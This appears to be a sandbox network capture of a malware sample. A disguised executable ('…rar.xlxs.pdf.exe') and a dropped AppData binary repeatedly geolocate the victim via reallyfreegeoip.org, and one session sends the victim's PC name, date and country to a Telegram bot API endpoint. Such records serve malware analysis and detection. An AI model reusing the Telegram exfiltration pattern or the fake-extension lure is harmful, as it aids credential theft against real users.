Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49719	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:35 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:35 UTC	686	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63589 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1S0eTEslMw6fL16pUIRYRqG%2ByqkbqaPQ6w4PHAuA890V95wb77CRzgUsO%2BKaIRldHS%2BeQbi%2FPDGsm4vaMoV%2FB4FuODM5QEGP%2B2USUYWJVh%2FPwz9sFvlgSxI%2FjrqxX4cGqzzY8LI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25caf85a42d5-EWR
2024-10-03 07:16:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49725	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:38 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:38 UTC	684	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:38 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63592 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5l%2FFckR4M%2BzmitcUS5FOJH5twbD7S6P9Xe4zRnbj2TbQsyae4gTxG6mR3P0Ex98roFzFqjHqTPWtv1Us%2FZHN9%2BdHbRzPzFx6RkOMfSp1zFQurxTn%2FrR%2FPzi5sU2RoNeISQux%2FfDW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25da6ddf7d0c-EWR
2024-10-03 07:16:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49727	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:40 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:40 UTC	674	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63594 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cF1MbLL6s%2FLJRjtaWFYRBOihLNYtBUZa%2BtKxZH4r0rDZduZOHLHTxcfDuUpLuFhkpv04PVObMlddMlwMnIHZqcyyL49nhcaFB8DysjYhMLrewjbNm8y24ChsU3yjn1fJ5MzIeq5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25eb08221815-EWR
2024-10-03 07:16:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49728	188.114.96.3	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:41 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:41 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63595 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FJYiYyrkejkFeMnFWWfC4UYyX806njwyxwXOIdA3YDKEE39WzrPY0i%2F5T3mRM6rja9wOLHjkbR0LqSoXuY36lAKuRo6Z7AuAjALUMfd9c56V%2B54z35LLoFVKdjbhlicSKkiifD9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25ed0c15c32e-EWR
2024-10-03 07:16:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49729	149.154.167.220	443	7220	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:41 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-03 07:16:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:16:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-03 07:16:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49730	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:43 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:43 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:43 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63597 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgLx9dmzmS1pLyk%2B2GI9Me89R2d7rQx2J0T86FUpC3rfmQ7pKeyQN1172UZUnfsIDCNHHXa533qmwiY616P4B0HprRpYumyVwnJhctXwndUuMIbIR8izwzFlkgwmzuF46TzYUdTg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb25fc3ae61881-EWR alt-svc: h3=":443"; ma=86400
2024-10-03 07:16:43 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49732	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:45 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:45 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63599 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=szijKAfckmwRlzg%2BgiXYul0uXbiJIyDs97aPEChlYip1yQe%2ByAzsLWJ13DN87l22PCyuENx9wrEGi%2FWU65%2BigdggTclwVuxOFnZaY0m3u29XyN%2FVfW737lcMzbOAOf7XqInjbcz9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb26091ad00f64-EWR alt-svc: h3=":443"; ma=86400
2024-10-03 07:16:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49735	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:48 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:48 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:48 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63602 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWClVzzqYI9yI9PIC9dgIoaPyb9sswwhVuD0pzvn1iduW9kSNqMurLhuBZAgN2MJ9vxklE%2BETZNJnjOQw4lU2LUjsA1mkwVpa2U492iR4DKHhpbpkkvVkPQVNFce6JSp1aoHr%2F%2FG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb261c5ef543f1-EWR
2024-10-03 07:16:48 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49738	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:50 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:50 UTC	684	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:50 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63604 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4A%2FKLdtNMHVXj5bdWlOtlIzxIN%2FkplUmszL0Y%2By8I%2FEx1oCJ9CuA5Fus4L5KyBHUsNxWf9MjHB3LF%2FsN2GMYIGLaRjwxX5swfZU6%2BFE8SAhAvXik%2BejjDBbjsXoIV18RuEv7FAD9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb2627686a5e68-EWR
2024-10-03 07:16:50 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49740	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:52 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:52 UTC	684	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:52 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63606 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ee7Z4aMe%2F%2Fp1F6%2FI4%2BXqLlKWqVN6mnMa%2B%2BsMwqYWuc7gsgu1EoBy6xCL8JzMTThD0MXENPZY7lQPOWRwmSn5kTgY6h5FjY73efTWFaebA6lSH1Us8Oay3dpXkvYiv6i3%2F8t0exD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb2631fab642ad-EWR
2024-10-03 07:16:52 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49743	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:54 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-03 07:16:54 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63608 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLc5WQex%2B40dCDD7IXRfBnQclgxKdf1ix2uIaEr836zl2u7XnazLzoXTwjTaVa7ZedoqC9nVCqLC3lF3xEpSiDLVpNpLThM5Am5QokRw%2BQIknUolDqxAPBoNzx30k6kfTdF9%2F3TC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb2641adab729b-EWR
2024-10-03 07:16:54 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United 